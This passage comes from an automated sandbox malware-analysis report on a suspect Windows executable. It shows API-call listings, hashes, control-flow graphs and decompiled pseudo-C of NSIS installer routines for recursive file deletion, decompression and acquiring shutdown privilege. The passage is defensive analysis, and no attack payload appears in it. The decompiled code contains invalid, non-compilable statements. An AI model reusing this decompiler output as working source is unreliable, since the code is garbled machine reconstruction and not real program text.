                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\fyTwP4SHWF.exe,00420F08,00000001), ref: 00403B21
                      • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                      • ExitProcess.KERNEL32(?), ref: 00403B6C
                      • OleUninitialize.OLE32(?), ref: 00403B71
                      • ExitProcess.KERNEL32 ref: 00403B8B
                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                      • ExitProcess.KERNEL32 ref: 00403C1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                      • String ID: "C:\Users\user\Desktop\fyTwP4SHWF.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\fyTwP4SHWF.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                      • API String ID: 2292928366-2685793396
                      • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                      • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                      • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                      • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                      C-Code - Quality: 98%
                      			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                      				signed int _v8;
                      				signed int _v12;
                      				short _v556;
                      				short _v558;
                      				struct _WIN32_FIND_DATAW _v604;
                      				signed int _t38;
                      				signed int _t52;
                      				signed int _t55;
                      				signed int _t62;
                      				void* _t64;
                      				signed char _t65;
                      				WCHAR* _t66;
                      				void* _t67;
                      				WCHAR* _t68;
                      				void* _t70;
                      
                      				_t65 = _a8;
                      				_t68 = _a4;
                      				_v8 = _t65 & 0x00000004;
                      				_t38 = E0040603F(__eflags, _t68);
                      				_v12 = _t38;
                      				if((_t65 & 0x00000008) != 0) {
                      					_t62 = DeleteFileW(_t68); // executed
                      					asm("sbb eax, eax");
                      					_t64 =  ~_t62 + 1;
                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                      					return _t64;
                      				}
                      				_a4 = _t65;
                      				_t8 =  &_a4;
                      				 *_t8 = _a4 & 0x00000001;
                      				__eflags =  *_t8;
                      				if( *_t8 == 0) {
                      					L5:
                      					E00406668(0x425750, _t68);
                      					__eflags = _a4;
                      					if(_a4 == 0) {
                      						E00405F83(_t68);
                      					} else {
                      						lstrcatW(0x425750, L"\\*.*");
                      					}
                      					__eflags =  *_t68;
                      					if( *_t68 != 0) {
                      						L10:
                      						lstrcatW(_t68, 0x40a014);
                      						L11:
                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                      						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                      						_t70 = _t38;
                      						__eflags = _t70 - 0xffffffff;
                      						if(_t70 == 0xffffffff) {
                      							L26:
                      							__eflags = _a4;
                      							if(_a4 != 0) {
                      								_t30 = _t66 - 2;
                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                      								__eflags =  *_t30;
                      							}
                      							goto L28;
                      						} else {
                      							goto L12;
                      						}
                      						do {
                      							L12:
                      							__eflags = _v604.cFileName - 0x2e;
                      							if(_v604.cFileName != 0x2e) {
                      								L16:
                      								E00406668(_t66,  &(_v604.cFileName));
                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                      								if(__eflags == 0) {
                      									_t52 = E00405D2C(__eflags, _t68, _v8);
                      									__eflags = _t52;
                      									if(_t52 != 0) {
                      										E004056CA(0xfffffff2, _t68);
                      									} else {
                      										__eflags = _v8 - _t52;
                      										if(_v8 == _t52) {
                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                      										} else {
                      											E004056CA(0xfffffff1, _t68);
                      											E00406428(_t67, _t68, 0);
                      										}
                      									}
                      								} else {
                      									__eflags = (_a8 & 0x00000003) - 3;
                      									if(__eflags == 0) {
                      										E00405D74(__eflags, _t68, _a8);
                      									}
                      								}
                      								goto L24;
                      							}
                      							__eflags = _v558;
                      							if(_v558 == 0) {
                      								goto L24;
                      							}
                      							__eflags = _v558 - 0x2e;
                      							if(_v558 != 0x2e) {
                      								goto L16;
                      							}
                      							__eflags = _v556;
                      							if(_v556 == 0) {
                      								goto L24;
                      							}
                      							goto L16;
                      							L24:
                      							_t55 = FindNextFileW(_t70,  &_v604); // executed
                      							__eflags = _t55;
                      						} while (_t55 != 0);
                      						_t38 = FindClose(_t70); // executed
                      						goto L26;
                      					}
                      					__eflags =  *0x425750 - 0x5c;
                      					if( *0x425750 != 0x5c) {
                      						goto L11;
                      					}
                      					goto L10;
                      				} else {
                      					__eflags = _t38;
                      					if(_t38 == 0) {
                      						L28:
                      						__eflags = _a4;
                      						if(_a4 == 0) {
                      							L36:
                      							return _t38;
                      						}
                      						__eflags = _v12;
                      						if(_v12 != 0) {
                      							_t38 = E0040699E(_t68);
                      							__eflags = _t38;
                      							if(_t38 == 0) {
                      								goto L36;
                      							}
                      							E00405F37(_t68);
                      							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                      							__eflags = _t38;
                      							if(_t38 != 0) {
                      								return E004056CA(0xffffffe5, _t68);
                      							}
                      							__eflags = _v8;
                      							if(_v8 == 0) {
                      								goto L30;
                      							}
                      							E004056CA(0xfffffff1, _t68);
                      							return E00406428(_t67, _t68, 0);
                      						}
                      						L30:
                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                      						return _t38;
                      					}
                      					__eflags = _t65 & 0x00000002;
                      					if((_t65 & 0x00000002) == 0) {
                      						goto L28;
                      					}
                      					goto L5;
                      				}
                      			}


















                      0x00405d7e
                      0x00405d83
                      0x00405d8c
                      0x00405d8f
                      0x00405d97
                      0x00405d9a
                      0x00405d9d
                      0x00405da5
                      0x00405da7
                      0x00405da8
                      0x00000000
                      0x00405da8
                      0x00405db3
                      0x00405db6
                      0x00405db6
                      0x00405db6
                      0x00405dba
                      0x00405dcd
                      0x00405dd4
                      0x00405dd9
                      0x00405ddd
                      0x00405ded
                      0x00405ddf
                      0x00405de5
                      0x00405de5
                      0x00405df2
                      0x00405df6
                      0x00405e02
                      0x00405e08
                      0x00405e0d
                      0x00405e13
                      0x00405e1e
                      0x00405e24
                      0x00405e26
                      0x00405e29
                      0x00405ed3
                      0x00405ed3
                      0x00405ed7
                      0x00405ed9
                      0x00405ed9
                      0x00405ed9
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405e2f
                      0x00405e2f
                      0x00405e2f
                      0x00405e37
                      0x00405e57
                      0x00405e5f
                      0x00405e64
                      0x00405e6b
                      0x00405e86
                      0x00405e8b
                      0x00405e8d
                      0x00405eb1
                      0x00405e8f
                      0x00405e8f
                      0x00405e92
                      0x00405ea6
                      0x00405e94
                      0x00405e97
                      0x00405e9f
                      0x00405e9f
                      0x00405e92
                      0x00405e6d
                      0x00405e73
                      0x00405e75
                      0x00405e7b
                      0x00405e7b
                      0x00405e75
                      0x00000000
                      0x00405e6b
                      0x00405e39
                      0x00405e41
                      0x00000000
                      0x00000000
                      0x00405e43
                      0x00405e4b
                      0x00000000
                      0x00000000
                      0x00405e4d
                      0x00405e55
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405eb6
                      0x00405ebe
                      0x00405ec4
                      0x00405ec4
                      0x00405ecd
                      0x00000000
                      0x00405ecd
                      0x00405df8
                      0x00405e00
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405dbc
                      0x00405dbc
                      0x00405dbe
                      0x00405ede
                      0x00405ee0
                      0x00405ee3
                      0x00405f34
                      0x00405f34
                      0x00405f34
                      0x00405ee5
                      0x00405ee8
                      0x00405ef3
                      0x00405ef8
                      0x00405efa
                      0x00000000
                      0x00000000
                      0x00405efd
                      0x00405f09
                      0x00405f0e
                      0x00405f10
                      0x00000000
                      0x00405f2b
                      0x00405f12
                      0x00405f15
                      0x00000000
                      0x00000000
                      0x00405f1a
                      0x00000000
                      0x00405f21
                      0x00405eea
                      0x00405eea
                      0x00000000
                      0x00405eea
                      0x00405dc4
                      0x00405dc7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405dc7

                      APIs
                      • DeleteFileW.KERNELBASE(?,?,772EFAA0,772EF560,00000000), ref: 00405D9D
                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\*.*,\*.*), ref: 00405DE5
                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                      • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E0E
                      • FindFirstFileW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\*.*,?,?,?,0040A014,?,C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\*.*,?,?,772EFAA0,772EF560,00000000), ref: 00405E1E
                      • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                      • FindClose.KERNELBASE(00000000), ref: 00405ECD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                      • String ID: .$.$C:\Users\user~1\AppData\Local\Temp\nsvBAAD.tmp\*.*$\*.*
                      • API String ID: 2035342205-3668129683
                      • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                      • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                      • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                      • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 631->635 632->619 634->578 635->602
                      C-Code - Quality: 98%
                      			E00406D5F() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				void* _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t590;
                      				signed int* _t607;
                      				void* _t614;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t614 - 0x40) != 0) {
                      						 *(_t614 - 0x34) = 1;
                      						 *(_t614 - 0x84) = 7;
                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                      						L132:
                      						 *(_t614 - 0x54) = _t607;
                      						L133:
                      						_t531 =  *_t607;
                      						_t590 = _t531 & 0x0000ffff;
                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                      						if( *(_t614 - 0xc) >= _t565) {
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                      							 *(_t614 - 0x40) = 1;
                      							_t532 = _t531 - (_t531 >> 5);
                      							 *_t607 = _t532;
                      						} else {
                      							 *(_t614 - 0x10) = _t565;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                      						}
                      						if( *(_t614 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t533 =  *(_t614 - 0x84);
                      							L140:
                      							 *(_t614 - 0x88) = _t533;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      						__esi =  *(__ebp - 0x60);
                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      						__ecx =  *(__ebp - 0x3c);
                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      						__ecx =  *(__ebp - 4);
                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						if( *(__ebp - 0x38) >= 4) {
                      							if( *(__ebp - 0x38) >= 0xa) {
                      								_t97 = __ebp - 0x38;
                      								 *_t97 =  *(__ebp - 0x38) - 6;
                      							} else {
                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      							}
                      						} else {
                      							 *(__ebp - 0x38) = 0;
                      						}
                      						if( *(__ebp - 0x34) == __edx) {
                      							__ebx = 0;
                      							__ebx = 1;
                      							L60:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t216 = __edx + 1; // 0x1
                      								__ebx = _t216;
                      								__cx = __ax >> 5;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L59:
                      								if(__ebx >= 0x100) {
                      									goto L54;
                      								}
                      								goto L60;
                      							} else {
                      								L57:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xf;
                      									goto L170;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t202 = __ebp - 0x70;
                      								 *_t202 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L59;
                      							}
                      						} else {
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      							}
                      							__ecx =  *(__ebp - 8);
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      							L40:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L38:
                      								__eax =  *(__ebp - 0x40);
                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      									while(1) {
                      										if(__ebx >= 0x100) {
                      											break;
                      										}
                      										__eax =  *(__ebp - 0x58);
                      										__edx = __ebx + __ebx;
                      										__ecx =  *(__ebp - 0x10);
                      										__esi = __edx + __eax;
                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                      										__ax =  *__esi;
                      										 *(__ebp - 0x54) = __esi;
                      										__edi = __ax & 0x0000ffff;
                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      										if( *(__ebp - 0xc) >= __ecx) {
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      											__cx = __ax;
                      											_t169 = __edx + 1; // 0x1
                      											__ebx = _t169;
                      											__cx = __ax >> 5;
                      											 *__esi = __ax;
                      										} else {
                      											 *(__ebp - 0x10) = __ecx;
                      											0x800 = 0x800 - __edi;
                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      											__ebx = __ebx + __ebx;
                      											 *__esi = __cx;
                      										}
                      										 *(__ebp - 0x44) = __ebx;
                      										if( *(__ebp - 0x10) < 0x1000000) {
                      											L45:
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t155 = __ebp - 0x70;
                      											 *_t155 =  *(__ebp - 0x70) + 1;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      										}
                      									}
                      									L53:
                      									_t172 = __ebp - 0x34;
                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                      									L54:
                      									__al =  *(__ebp - 0x44);
                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      									L55:
                      									if( *(__ebp - 0x64) == 0) {
                      										 *(__ebp - 0x88) = 0x1a;
                      										goto L170;
                      									}
                      									__ecx =  *(__ebp - 0x68);
                      									__al =  *(__ebp - 0x5c);
                      									__edx =  *(__ebp - 8);
                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      									 *( *(__ebp - 0x68)) = __al;
                      									__ecx =  *(__ebp - 0x14);
                      									 *(__ecx +  *(__ebp - 8)) = __al;
                      									__eax = __ecx + 1;
                      									__edx = 0;
                      									_t191 = __eax %  *(__ebp - 0x74);
                      									__eax = __eax /  *(__ebp - 0x74);
                      									__edx = _t191;
                      									L79:
                      									 *(__ebp - 0x14) = __edx;
                      									L80:
                      									 *(__ebp - 0x88) = 2;
                      									goto L1;
                      								}
                      								if(__ebx >= 0x100) {
                      									goto L53;
                      								}
                      								goto L40;
                      							} else {
                      								L36:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xd;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t121 = __ebp - 0x70;
                      								 *_t121 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L38;
                      							}
